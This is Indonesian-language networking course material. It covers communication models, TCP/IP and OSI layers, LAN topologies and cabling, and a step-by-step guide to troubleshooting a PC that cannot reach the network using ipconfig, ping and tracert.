- Internt society, bertugas mendukung dan mempromosikan pertumbuhan internet sebagai sarana komunikasi untuk riset.
- Internet Architecture Board ( IAB ), badan penasihat teknis bagi internet society, IAB mempunyai wewenang untuk menerbitkan dokumen standar Internet.
- Internet Egineering TaskForce ( IETF ), badan yang berorientasi membentuk standar internet. Badan ini dibagi menjadi 9 kelompok, masing - masing kelompok kerja tersebut adalah: kelompok kerja routing, aplikasi, addresing, keamanan komputer dan lain- lain.
- Internet Research Task Force ( IRTF ), lembaga untuk pemilihan standarisasi dalam jangka panjang.

Intro LAN



Antara tahun '70 - '80 terjadi penggabungan ilmu komputer dan komunikasi data yang merubah secara mendalam teknologi, produk, dan perusahaan dari penggabungan industry computer - komunikasi yang baru. Meskipun konsekuensi dari penggabungan revolusi masih dikerjakan, hal ini aman untuk dikatakan bahwa revolusi telah terjadi dan beberapa investivigasi dari komunikasi data harus dibuat dengan konteks / batas yang baru.
Computer  dan revolusi komunikasi telah dihasilkan beberapa fakta yang luar biasa,yaitu :

Tidak ada perbedaan yang mendasar antara proses data(computer) dan komunikasi data(pengiriman dan perubahan peralatan)
Tidak ada perbedaam yang mendasar antara data, suara, dan komunikasi video
Hubungan antara prosesor tunggal computer, banyak prosesor , jaringan local, jaringan kota, dan jaringan luas telah kabur


Satu efek dari tren ini sedang tumbuh tumpang tindih antara komputer dan industri komunikasi dari pembuatan komponen ke integrasi system.Hasil lainnya adalah pengembangan system yang terintegrasi yang dikirimkan dan mengolah semua tipe data dan informasi. Keduanya, teknologi dan organisasi ilmuwan sedang mengarahkan ke arah satu sistem publik yang menggabungkan semua komunikasi dan membuat semua data maya dan sumber informasi seluruh dunia dengan mudah dan seragam dapat diakses

Hal ini adalah tujuan yang ambisius dari buku ini untuk memberikan perpaduan pandangan dari pandangan yang luas tentang data dan komunikasi komputer.Susunan buku merefleksikan  usaha memecahkan subjek yang besar ke bagian yang menyeluruh dan untuk membangun pecahan - pecahan,tinjauan dari seni. Introduksi ini dimulai dengan model komunikasi yang umum. Kemudian, diskusi yang hebat menerangkan 4 bagian utama dari buku. Kemudian , dari semua aturan yang penting adalah diperkenalkan. Akhirnya, outline yang pendek dari sebagian buku disediakan.  
 
A.    Model Komunikasi
Tujuan utama yang mendasar dari system komunikasi adalah pertukaran data antara 2 bagian.Contohnya ialah system telepon dimana keduanya salaing menukar suara pada jaringan yang sama.. Kunci dari model komunikasi ini adalah :




Sumber : Alat yang membuat data untuk dikirimkan, contoh : telepon dan PC
Transmitter : data yang dibuat oleh sumber tidaklah langsung dikirimkan sesuai bentuknya ketika dibuat. Oleh karena itu transmitter berfungsi untuk mengubah dan mengkodekan agar menjadi signal elektromagnetik dan dapat dikirimkan melewati system transmisi. Contohnya ialah modem yang megkodekan data menjadi signal analog yang kemudian dikirim melalui jaringan telepon.
Transmission system : Hal ini dapat berupa tranmisi tunggal maupun jaringan yang rumit yang menghubungkan sumber dan tujuan.
Receiver : receiver menyetujui signal dari system transmisi dan mengubahnya menjadi bentuk semula
Destination : mengambil data yang masuk dari receiver

Beberapa hal yang harus dilakukan pada system komunikasi  dibawah ini dapat ditambahkan ataupun digabung , yaitu :
1.      Transmission system Utilization
2.      Interfacing
3.      Signal generation
4.      Synchronization
5.      Exchange management
6.      Errot detection and correction
7.      Flow control
8.      Addressing and routing
9.      Recovery
10.  Message formatting
11.  Security
12.  Network management



B.      Jaringan Komunikasi Data
Bentuk yang paling simple  pada komunikasi terdiri dari 2 alat yang saling terhubung pada media transmisi. Namun hal ini kurang praktis jika hanya 2 alat yang terhubung, karena ada beberapa kemungkinan, yaitu :
Bila 2 alat yang sangat berjauhan, hal ini membuat biaya yang sangat mahal untuk membentuk jaringan antara 2 alat.
Saat ini diperlukan hubungan banyak alat pada suatu waktu contohnya ialah jaringan telpon dunia dan semua terminal dan computer yang dimiliki oleh suatu organisasi. Kecuali dalam keadaan jumlah alat yang sedikit, namun hal ini sangat tidak praktis untuk menghubungkan satu per satu antara 1 alat.

Solusi dari beberapa hal tersebut ialah dengan menghubungkan setiap alat dengan jaringan komunikasi, dimana secara garis besar dapat dibagi menjadi 2 bagian yaitu :
LAN
1.      Meliputi kawasan yang kecil seperti gedung atau kampus
2.      Selalu dimiliki oleh organisasi yang sama
3.      Lalu lintas data relative lebih besar daripada WAN
4.     
WAN
1.      Meliputi area yang luas
2.      Memiliki pilihan teknologi yaitu :
§         Circuit switching
§         Packet switching
§         Frame Relay
§         ATM
§         ISDN




Contoh Jaringan :




Jaringan-jaringan saat ini dapat dikategorikan menjadi :
      Packet Switch
1.      ATM
2.      Frame Relay
3.      TCP/IP
      Circuit Switch
1.      Analog PSTN
2.      ISDN




C.      Protokol dan Protokol arsitektur
Protokol pada jaringan digunakan diantara suatu kesatuan di dalam system, yaitu :
Entities : fasilitas e-mail, aplikasi yang digunakan pengguna
System : computer, terminal, sensor

Oleh karena itu entity harus memiliki bahasa yang sama, contohnya ialah mengirim data dengan FTP, client dan server harus memiliki protocol yang sama.
Kunci dari komponen protokol ialah
      Syntax              : berisi format data dan signal level
      Semantic         : mengatur informasi dan memperbaikikesalahan
      Timing                         : memadukan kecepatan dan urutan

 Tugas dari komunikasi ini terbagi menjadi beberapa bagian.Contohnya ialah pengirman data dapat menggunakan / melalui 2 modul :
File transfer application :mengatur pengiriman dengan perintah
Communication service module: mengatur kehandalan data dan mengirim perintah
Network access module: membuat dan merawat komunikasi yang melewati jaringan

Layering
Ide umum dari layering ialah penyediaan pelayanan oleh hardware yang dasar sebagai model dari lapisan fisik. Penambahan urutan layering akan memberikan tingkatan pelayanan yang lebih tinggi. Layering memberikan 2 keunggulan :
Menyederhanakan tugas dari jaringan gedung
Memberikan rancangan yang modular



Contohnya ialah 3 model lapisan yang dasar :
1.                       Network access layer
Menukar data antara computer dan jaringan
Menyediakan alamat tujuan dari pengiriman data

2.                       Transport layer
Memiliki kebebasan dalam penggunaan jaringan yang digunakan
Memiliki kebebasan dalam menggunakan aplikasi pada pengguna
Sangat berguna dan dapat diandalkan pada pertukaran data
3.                       Application layer
Mendukung dalam penggunaan aplikasi yang digunakan user seperti e-mail dan file transfer

Hal - hal yang diperlukan dalam addressing :

Ø      Diperlukan 2 tingkat pengalamatan
Ø      Setiap computer perlu memiliki alamat yang unik
Ø      Setiap aplikasi yang berjalan pada computer juga perlu memilik alamat yang unik



 Protokol Data Unit
      Setiap lapisan, protokol di pergunakan untuk berkomunikasi
      Kontrol Informasi di beri kepada pengguna data di setiap lapisan protokol
      Transportasi lapisan protokol memungkinkan pengguna data di bagi-bagi menjadi beberapa bagian
      Setiap bagian data yang dikirimkan mempunyai tambahan data yang ditambahkan pada data asli yang kita kirim ke penerima,sehingga memberikan tranportasi protokol unit data, data tambahan tersebut berisi :
o       Alamat Tujuan
o       Urutan nomor ke tujuan
o       Kode pendeteksi kesalahan

      Unit data protokol jaringan juga memperoleh tambahan jaringan yang berisi alamat jaringan untuk mencapai computer  tujuan.



Karakteristik Protokol
      Karakteristik protokol ada 2 macam, yaitu :
o       Direct
§         Sistem pembagian di hubungkan secara point to point atau sistem pembagian  dengan menghubungkan banyak titik
§         Data dapat lewat tanpa adanya pengaruh perantara aktif
o       Indirect
§         Menggunakan switch jaringan/melalui perantara jaringan/internet
      Struktur protokol
o       Komunikasi merupakan suatu pekerjaan komplex
o       Design struktur menyelesaikan permasalahan menjadi bagian-bagian yg kecil
      simetri dan Asimetri
o       Simetris , hubungan komunikasi antara dua komputer
o       Asimetris, hubungan antara satu komputer dengan sebuah pusat jaringan
      Standar dan Non-standar
o       Pada jaringan nonstandar alat-alat yang berada pada jaringan terhubung satu per satu namum hal ini kurang menguntungkan dan efesien sehingga di ciptakan jaringan standar yang menggunakan sistem multipleing yaitu memanfaatkan sebuah jaringan yang menghubungkan banyak device.


D.   Arsitektur protokol TCP/IP
Arsitektur protokol TCP/IP dikembangkan oleh US Defence Advanced Research Project Agency (DARPA) for its packet switched network (ARPANET). Protokol ini dibuat untuk sistem internet global yang kita pakai sampai dengan sekarang yang dibuat berdasarkan kumpulan protokol yang membuat suatu standar internet (Internet Architecture Board (IAB)

5 lapisan independen arsitektur protokol TCP/IP :
1.    Lapisan fisikal
Lapisan fiscal ini meliputi Interface fisik  antara alat transmisi data dengan media transmisi atau jaringan dan media transmisi yang digunakan. Selain itu data rate dan tingkat signal juga berada pada lapisan ini.
2.    Lapisan jaringan akses
Berisi Pertukaran data antara sistem akhir dan jaringan. Selain itu juga berisi tujuan alamat yang dituju dan berfungsi untuk memanggil layanan seperti prioritas.
3.    Lapisan internet (IP)
Pada layer ini beberapa sistem bisa disambungkan ke beberapa jaringan yang luas dan dapat menyediakan fungsi routing melewati jaringan berlapis. Sehingga dapat diimplementasikan di dalam sistem akhir dan router
4.    Lapisan transportasi ( host to host )
Dari awal sampai akhir proses transfer data, permintaan untuk pengiriman
Memungkinkan untuk memasukkan mekanisme reliabilitas ( TCP ) dan menyembunyikan detil dari jaringan yang berada di dasar.
5.    Lapisan aplikasi
Mendukung untuk aplikasi - aplikasi para pengguna ( HTTP, SMTP, NNTP )
                                                     



E.   Model Open Systems Interconnection ( OSI )
Ø Dikembangkan oleh International Organisation for Standardisation ( ISO )
Ø      Terdiri dari 7 lapisan yaitu : Application, Presentation, Session, Transport, Network, Data Link, Physical


Ø      Sistem yang diberikan dapat dikatakan terlambat. TCP/IP adalah standar secara de facto
Ø      Sebuah model lapisan dimana setiap lapisan mengerjakan persyaratan fungsi - fungsi komunikasi
Ø      Setiap lapisan bergantung pada lapisan yang lebih rendah untuk mengerjakan fungsi - fungsi primitif
Ø      Setiap lapisan menyediakan servis - servis untuk ke lapisan yang lebih tinggi
Ø      Perubahan dalam 1 lapisan tidak membutuhkan perubahan dari lapisan lainnya


MENDIAGNOSIS PERMASALAHAN PERANGKAT YANG TERSAMBUNG JARINGAN BERBASIS WAN



1.1. Local Area Network (LAN)
Local Area Network (LAN) merupakan jaringan milik pribadi di dalam sebuah gedung atau kampus yang berukuran sampai beberapa kilometer. LAN seringkali digunakan untuk menghubungkan komputer-komputer pribadi dan workstation dalam kantor perusahaan atau pabrik-pabrik untuk memakai bersama resource (misalnya, printer, scanner) dan saling bertukar informasi. LAN dapat dibedakan dari jenis jaringan lainnya berdasarkan tiga karakteristik: ukuran, teknologi transmisi dan topologinya. LAN mempunyai ukuran yang terbatas, yang berarti bahwa waktu transmisi pada keadaan terburuknya terbatas dan dapat diketahui sebelumnya. Dengan mengetahui keterbatasnnya, menyebabkan adanya kemungkinan untuk menggunakan jenis desain tertentu. Hal ini juga memudahkan manajemen jaringan. LAN seringkali menggunakan teknologih transmisi kabel tunggal. LAN tradisional beroperasi pada kecepatan mulai 10 sampai 100 Mbps (mega bit/detik) dengan delay rendah (puluhan mikro second) dan mempunyai faktor kesalahan yang kecil. LAN-LAN modern dapat beroperasi pada kecepatan yang lebih tinggi, sampai ratusan megabit/detik.
1.1.1 Topologi LAN
1.1.1.1 Topologi Bus
Topologi Bus
Karakteristik topologi ini adalah sebagai Berikut :
Disebut juga Daisy Chain.
• Paling banyak dipakai karena sederhana dalam instalasi.
• Pada topologi bus, terdapat satu jalur umum yang berbentuk suatu garis lurus. Yang mana kemudian masing-masing node dihubungkan kedalam jalur garis tersebut.
• Transmisi dari suatu workstation dapat menyebar dan menjalar ke workstation lainnya, ini disebabkan setiap workstation menggunakan media transmisi yang sama.
• Dapat terjadi collision (dua paket data tercampur), karena sinyal mengalir dalam dua arah.
• Problem terbesar : jika salah satu segmen kabel putus, maka seluruh jaringan akan terhenti.
• Meskipun ada percabangan media transmisi, tetapi tidak membentuk jalur tertutup (closed loop).
• Berupa bentangan satu kabel yang kedua ujungnya ditutup oleh terminator dan terdapat node-node sepanjang kabel.
• Instalasi mudah dilakukan.
1.1.1.2 Topologi Star
Topologi Star
Karakteristik topologi ini sebagai berikut :
• Medium transmisi yang digunakan dalam tipe topologi ini, membentuk jalur tertutup (closed loop), dan setiap workstation mempunyai kabel tersendiri untuk langsung berhubungan dengan file server, sehingga seluruh sistem tidak akan gagal bila ada salah satu kabel pada workstation yang terganggu.
• Mudah dikembangkan, karena tiap node hanya memiliki kabel yang langsung terhubung kecentral node.
• Dapat digunakan kabel yang "lower grade", karena hanya menghandle satu lalu lintas data, biasanya digunakan kabel UTP.Node-node tersambung langsung ke suatu node pusat (biasa berupa hub), sehingga mudah dikembangkan.
• Keuntungannya dari topologi star adalah apabila satu kabel node terputus, node lainnya tidak terganggu
1.1.1.3 Topologi Ring
Topologi Ring
Karakteristik topologi ini sebagai berikut :
• Dalam topologi ring, setiap node dihubungkan dengan node lain, sehingga membentuk lingkaran.
• Karena sistem transmisinya menggunakan kabel yang saling menghubungkan beberapa workstation dengan file server dalam bentuk lingkaran tertutup, maka tipe ini memiliki kelemahan, yaitu apabila pada salah satu hubungan ada yang putus, maka keseluruhan hubungan terputus.
1.1.2. Hardware untuk LAN
1.1.2.1 Kartu jaringan (NIC)
Kartu jaringan
Kartu jaringan adalah seperangkat papan circuit yang ditancapkan pada motherboard sebuah PC yang berfungsi untuk menghubungkan computer dengan medium jaringan. Pada sebuah Laptop ataupun Notebook biasanya disebut PCMCIA card dengan bentuk yang tipis terlihat spt gambar berikut:
1.1.2.2 Kabel
Ada beberapa macam kabel yang digunakan untuk medium jaringan
1.1.2.2.1 Kabel STP
kabel STP terdiri 4 pasang kabel terpilin yang dibungkus dan mempunyai kecepatan transfer dari 10 – 100 Mbps dan panjang maksimum sekitar 100 m
konektor yang digunakan biasanya RJ 45
1.1.2.2.2 Kabel UTP
Kabel UTP sama seperti kabel UTP hanya saja tidak terbungkus, kabel jenis inilah yang banyak digunakan untuk membuat sebuah LAN.
1.1.2.2.3 Kabel Koaksial
Kabel koaksial terdiri dari sebuah kabel /kawat inti yang diselubungi oleh kabel seperti jala. Medium jenis ini menggunakan konektor BNC
Kabel ini mempunyai karakteristik sebagai berikut :
• Kecepatan transfer data maksimal 10 Mbps.
• Coaxial sering digunakan untuk thick ethernet, thin ethernet, dan ARCnet.
• Digunakan dalam topologi bus
• Panjang maksimum sekitar 500m
1.1.2.2.3 Kabel Fiber Optik
Kabel Fiber Optik
Kabel jenis ini mempunyai kelebihan dibandingkan dengan kabel yang lain yaitu transfer data lebih dari 100Mbps, panjang maksimum lebih dari 2000m namun kabel jenis ini harganya relatif mahal.

Trouble Shooting
Perangkat untuk membangun jaringan terdiri dari dua macam yaitu software dan hardware, sehingga jika terjadi masalah pada koneksi jaringan maka kita bisa melakukan pemeriksaan pada kedua hal tersebut.
Periksa hardware jaringan
• Periksa apakah kartu jaringan rusak secara fisik atau tidak
• Periksa apakah kabel sudah dipasang secara benar sesuai dengan prosedur
• Periksa apakah ada kerusakan pada Hub/konsetrator jaringan
Periksa software jaringan
• Periksa apakah kartu jaringan sudah diaktifkan melalui bios
• Periksa apakah kartu jaringan sudah ada drivernya yang terpasang
• Periksa apakah kartu jaringan sudah dikonfigurasikan IP-nya
Dengan melakukan pemeriksaan kedua hal tersebut maka kita bisa memilah jenis masalah yang timbul dan melakukan trouble shootig berdasar jenis permasalahan yang muncul.

3.1. Langkah isolasi kerusakan
Supaya tidak terjadi kerusakan saat pemakaian perangkat jaringan baik yangberupa hardware maupun software maka kita perlu memperhatikan beberapa hal.
Kerusakan perangkat keras
• Sebelum memasang perangkat jaringan, semua diperiksa secara cermat apakah terdapat cacat secara fisik pada perangkat tersebut.
• Bacalah manual dari tiap – tiap perangkat untuk mengetahui kemampuan kerja dari alat tersebut.
• Jika terdapat kerusakan pada alat, langsung lakukan penggantian alat.
• Jangan pernah memaksakan alat untuk bekerja melebihi kemampuan alat.
Kerusakan Software
• Gunakan driver perangkat jaringan yang sesuai dan direkomendasikan oleh pembuat perangkat jaringan.
• Jangan pernah membiarkan PC tanpa software anti virus, karena virus menyerang melalui jaringan dan bisa mengganggu koneksi jaringan.
• Gunakan software untuk monitoring kinerja jaringan sehingga bisa mendeteksi permasalahan koneksi lebih dini.
Untuk menghindari kerusakan yang lebih parah baik software maupun hardware maka pengawasan dan perawatan rutin secara berkala sangat diperlukan.

Troubleshooting Masalah Jaringan



Jika kita bertanggung jawab pada suatu jaringan infrastruktur corporate berskala besar, kita harus mempunyai kemampuan untuk menyelesaikan masalah yang berkaitan dengan jaringan baik masalah yang berdampak hanya pada sebuah komputer yang tidak bisa connect terhadap jaringan maupun masalah yang berimbas pada ambruknya system jaringan yang mempengaruhi system komunikasi jaringan secara global.
Jika sebuah komputer mengalami masalah komunikasi jaringan, banyak sebenarnya kemungkinan sumber masalah yang melatarbelakanginya. Permasalahan bisa jadi terletak pada stack protocol TCP/IP, bisa jadi terletak pada protocol layer data-link, atau mungkin saja dikarenakan masalah kerusakan piranti jaringan atau mungkin saja terputusnya kabel patch jaringan.
Mari kembali kepada scenario kita sebelumnya seperti pada gambar berikut ini.

Diagram Koneksi Jaringan
Scenario masalah jaringan berikut ini akan didiskusikan menurut jenis masalah yang mungkin saja terjadi pada sebuah komputer saja atau terjadi pada terganggunya jaringan corporate secara global, dengan menggunakan pendekatan troubleshooting masalah jaringan.
Masalah pada sebuah komputer
Kita misalkan sebuah komputer di kantor mining (harap mengacu pada gambar diatas) tidak dapat terhubung dengan jaringan, bagaimana anda melakukan troubleshooting masalah jaringan ini?
Untuk memudahkan troubleshooting masalah jaringan, sudah seharusnya anda mempunyai dokumentasi jaringan dari mulai diagram jaringan secara keseluruhan, system infrastructure fisik dan logical anda seperti system layanan directory, server domain name system, layanan DHCP server jaringan, dan lain-2.
Anda bisa memulai troubleshooting masalah jaringan ini sebagai berikut:
1. Apakah user bisa logon dan bisa mengakses resource jaringan?
a. TIDAK, apakah anda bisa logon menggunakan user admin account anda dan mengakses resource jaringan?
i. YA, periksa user account tersebut apakah masih valid, apakah user-name dan password sudah benar, apakah user-account tidak expired atau mungkin account lock-out yang biasanya dibarengi dengan system error waktu logon.
ii. TIDAK, berarti ada masalah, lanjut ke step 2
b. YA, berarti tidak ada masalah
2. Logon ke komputer dengan menggunakan local admin account, dan periksa konfigurasi protocol TCP/IP dengan command line “ipconfig /all” periksa hasilnya apa komputer sudah mendapatkan IP address dari DHCP server atau tidak? Periksa property TCP/IP nya apakah sudah di setup untuk menerima IP address otomatis “obtain an IP address automatically” dan juga “obtain DNS server automatically”
a. Jika setup nya salah, betulkan terlebih dahulu untuk menerima IP address secara automatis. Lompat kembali pada step 1.
b. Jika konfigurasi normal, tetapi tidak menerima IP address, lanjutkan pada step 3
3. Periksa apakah kabel patch ke tembok (kearah Swich) terputus atau tidak, atau mungkin lepas?
a. YA, jika kabel patch terputus, ganti dengan kabel yang bagus. Jika kabel terlepas, colokkan kembali dengan benar, lalu kembali ke step 1
b. TIDAK, periksa apakah indicator lampu led pada adapter LAN/NIC pada komputer berkedip atau tidak, biasanya ada dua lampu led – lampu jaringan yang selalu berkedip dan lampu power yang biasanya berwarna hijau konstan. Jika kedua lampu led indicator nyala, maka tidak ada masalah dengan jaringan. Apalah lampu indicator jaringan berkedip atau tidak?
i. YA, seharusnya tidak ada masalah dengan jaringan.
ii. TIDAK, teruskan ke step 4
4. Logon dengan menggunakan account admin local dan periksa apakah “LAN Card” di-disabled?
a. YA, berarti masalahnya LAN card disabled, anda bisa klik kanan dan pilih opsi “enabled” terus test lagi dengan melakukan “ipconfig /all” apakah IP address sudah diterima? Kalau belum, coba lagi dengan command “ipconfig /renew”, jika sudah dapat berarti sudah OK.
b. TIDAK, lanjutkan ke step 5
5. Ganti kabel patch dengan yang baru/bagus, apalah sekarang anda bisa logon dan mengakses resource jaringan?
a. YA, maka sampai disini anda menyelesaikan masala.
b. TIDAK, ada tiga kemungkinan sumber masalah:
i. NIC adapter rusak
ii. Port Switch faulty
iii. Kabel LAN antara sambungan di tembok ke Swicth bermasalah, bisa jadi kabel tersebut diserang / digigit tikus.
6. Jika anda ada LAN tester, itu akan memudahkan anda, anda bisa melakukan testing ke port RJ45 di wall-jack (sambungan ditembok), apakah ada sinyal LAN?
a. YA, jika line jaringan sudah OK, maka bisa dipastikan LAN adapter rusak. Ganti NIC adapter dan lompat ke step 1.
b. TIDAK, anda bisa memastikan sekarang bahwa sumber masalah adalah kabel antara sambungan di tembok (wall-jack) dengan Switch bermasalah. Anda bisa meminta teknisi kabel untuk menarik kabel baru antara wall-jack ke switch.
7. Selamat anda telah menyelesaikan troubleshooting masalah jaringan pada sebuah komputer yang tidak bisa mengkases jaringan.
Satu blok gedung tidak bisa mengakses jaringan
Troubleshooting masalah jaringan yang berdampak pada satu blok gedung tidak bisa mengakses jaringan akan lebih mudah troubleshootingnya akan tetapi lebih lama memperbaikinya. Jika saja anda membuat system redundansi link antar dua gedung tersebut, maka satu kabel bermasalah tidak akan membuat jaringan backbone anda terputus total, akan tetapi tetap saja anda harus memperbaikinya.
Lihat pada diagram diatas, antar dua gedung ditarik dua kabel backbone redundansi dengan mengaktifkan protocol STP (spanning tree protocol) pada kedua Switch sehingga jika terjadi masalah/terputus salah satu kabel, maka system jaringan hanya memerlukan beberapa detk saja untuk mengaktifkan kabel redundansi satunya lagi sehingga jaringan aktif kembali. Inilah fungsi protocol STP yang bekerja secara automatis, akan tetapi jika protocol STP ini tidak aktif maka anda akan mendapatkan masalah dengan broadcast storm, paket akan berputar-putar tanpa henti sampai kecapekan sendiri, da akibatnya jaringan anda menjadi super lambat.
Sekarang bagaimana anda bisa melakukan troubleshooting masalah jaringan jika seluruh jaringan local anda tidak bisa mengakses keluar Internet? Atau bagaimana anda melakukan troubleshooting jika telecommuter tidak bisa mengakses jaringan corporate secara remote?
Gunakan tool seperti: tracert; ping; dan pathping; ketiganya sangat efektif untuk membantu kita melakukan troubleshooting masalah jaringan antar site. Mungkin saja ada masalah dengan circuit switch frame relay di central office, atau jaringan leasing point-to-point anda ke ISP, atau bisa saja ada masalah dengan jaringan satellite anda (jika anda di remote site). Dan biasanya anda perlu troubleshooting pada layer network pada model referensi OSI.